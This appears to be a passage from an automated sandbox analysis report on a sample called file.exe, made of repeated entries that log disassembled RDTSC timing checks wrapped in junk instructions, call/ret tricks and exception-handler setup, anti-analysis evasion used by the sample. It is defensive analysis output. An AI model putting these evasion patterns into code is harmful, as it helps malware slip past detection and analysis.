              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BFF1 second address: C4BFF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BFF5 second address: C4C02B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1F18DC15CBh 0x0000000e jg 00007F1F18DC15CEh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C1CB second address: C4C1ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F1851F5E7h 0x00000008 js 00007F1F1851F5D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5C1 second address: C4C5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1F18DC15C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F1F18DC15CEh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5DE second address: C4C5E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C5E2 second address: C4C615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F1F18DC15D0h 0x0000000e jmp 00007F1F18DC15D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C92F second address: C4C93B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F1F1851F5D6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C40271 second address: C40276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C11FDB second address: C11FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CA98 second address: C4CA9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CA9C second address: C4CAB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DAh 0x00000007 js 00007F1F1851F5D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4D18B second address: C4D1A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007F1F18DC15CCh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4D76D second address: C4D785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F1F1851F5D6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16F86 second address: C16F8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16F8C second address: C16FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16FA1 second address: C16FBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C16FBF second address: C16FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C50AA3 second address: C50AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F18DC15CCh 0x0000000a jnl 00007F1F18DC15C6h 0x00000010 jne 00007F1F18DC15C8h 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b jns 00007F1F18DC15C6h 0x00000021 popad 0x00000022 popad 0x00000023 jng 00007F1F18DC15DCh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c pop eax 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C50AD2 second address: C50AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C50AD6 second address: C50ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52842 second address: C52850 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C52D02 second address: C52D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59224 second address: C59228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C59228 second address: C5922F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5922F second address: C59235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C586AB second address: C586B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5884C second address: C58875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1F1851F5DDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C589EF second address: C589FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1F18DC15C6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C589FC second address: C58A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F1851F5D6h 0x0000000a popad 0x0000000b jmp 00007F1F1851F5DEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C58E27 second address: C58E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DCF3 second address: C5DCF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E072 second address: C5E077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E077 second address: C5E081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F1F1851F5D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E1B3 second address: C5E1E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jmp 00007F1F18DC15CAh 0x00000013 pop esi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E1E0 second address: C5E1E5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E7CC second address: C5E7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D5h 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E7EB second address: C5E81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 xchg eax, ebx 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F1F1851F5D8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push ebx 0x00000022 mov esi, dword ptr [ebp+122D37B1h] 0x00000028 pop esi 0x00000029 nop 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5ED6C second address: C5ED9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F1F18DC15CCh 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F18DC15D9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F3AE second address: C5F3E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1F1851F5E7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1F1851F5E4h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F3E5 second address: C5F3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F3E9 second address: C5F3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FBF0 second address: C5FC00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F18DC15CCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C605FF second address: C60603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C60ECB second address: C60EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F1F18DC15C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C61726 second address: C6172A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6339F second address: C633C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D0h 0x00000007 jmp 00007F1F18DC15D1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633C4 second address: C633C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633C9 second address: C633F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F1F18DC15D7h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jo 00007F1F18DC15C6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64590 second address: C645BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F1F1851F5D6h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C65058 second address: C6505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6505C second address: C650A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F1F1851F5D8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1843h], ebx 0x0000002d push 00000000h 0x0000002f mov esi, dword ptr [ebp+122D2EF3h] 0x00000035 push 00000000h 0x00000037 movsx edi, ax 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C650A4 second address: C650A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C66F34 second address: C66F39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6749F second address: C6753B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1F18DC15D9h 0x00000008 jmp 00007F1F18DC15D3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1F18DC15C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a or dword ptr [ebp+1245A28Bh], ebx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F1F18DC15C8h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c push edx 0x0000004d mov edi, dword ptr [ebp+122D3911h] 0x00000053 pop edi 0x00000054 push 00000000h 0x00000056 call 00007F1F18DC15D6h 0x0000005b jmp 00007F1F18DC15D0h 0x00000060 pop edi 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6753B second address: C6753F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6753F second address: C67549 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6866B second address: C6867C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6867C second address: C68681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B4EA second address: C6B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007F1F1851F5D8h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F1F1851F5D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+1248A00Eh] 0x00000033 push 00000000h 0x00000035 xchg eax, esi 0x00000036 jmp 00007F1F1851F5DEh 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1F1851F5DBh 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B54B second address: C6B551 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A747 second address: C6A7E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F1F1851F5D8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 0000001Bh 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov bx, 67B7h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F1F1851F5D8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dword ptr fs:[00000000h], esp 0x0000004c mov bx, si 0x0000004f mov eax, dword ptr [ebp+122D161Dh] 0x00000055 jnp 00007F1F1851F5D8h 0x0000005b mov ebx, ecx 0x0000005d push FFFFFFFFh 0x0000005f adc bx, 0081h 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jmp 00007F1F1851F5E5h 0x0000006d jmp 00007F1F1851F5E8h 0x00000072 popad 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B551 second address: C6B55C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F1F18DC15C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A7E8 second address: C6A800 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1F1851F5DDh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C577 second address: C6C57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B661 second address: C6B66F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C57C second address: C6C583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B66F second address: C6B673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C583 second address: C6C5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jmp 00007F1F18DC15D2h 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+12489583h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F1F18DC15C8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 sub dword ptr [ebp+12493083h], ebx 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C5D3 second address: C6C5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E0h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C5E8 second address: C6C5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C5EE second address: C6C5F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C5F2 second address: C6C605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F1F18DC15D0h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D673 second address: C6D6D7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F1F1851F5E0h 0x0000000f jmp 00007F1F1851F5E1h 0x00000014 popad 0x00000015 nop 0x00000016 mov bx, di 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+1245FEB3h], esi 0x00000021 mov dword ptr [ebp+122D350Eh], ecx 0x00000027 push 00000000h 0x00000029 mov bx, di 0x0000002c xchg eax, esi 0x0000002d jc 00007F1F1851F5E4h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 jg 00007F1F1851F5D6h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C7E2 second address: C6C7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D6D7 second address: C6D6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E5D4 second address: C6E5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D84A second address: C6D854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D854 second address: C6D8F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jmp 00007F1F18DC15D4h 0x0000000e pop ebx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1F18DC15C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D37D5h] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jc 00007F1F18DC15C8h 0x0000003d mov bl, 26h 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov ebx, 780F0F1Ah 0x0000004b mov eax, dword ptr [ebp+122D1021h] 0x00000051 mov dword ptr [ebp+1245A2F0h], ebx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push edx 0x0000005c call 00007F1F18DC15C8h 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], edx 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc edx 0x0000006f push edx 0x00000070 ret 0x00000071 pop edx 0x00000072 ret 0x00000073 mov di, 4B61h 0x00000077 mov ebx, 3B57629Bh 0x0000007c nop 0x0000007d push edi 0x0000007e push eax 0x0000007f push edx 0x00000080 jbe 00007F1F18DC15C6h 0x00000086 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D8F4 second address: C6D8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
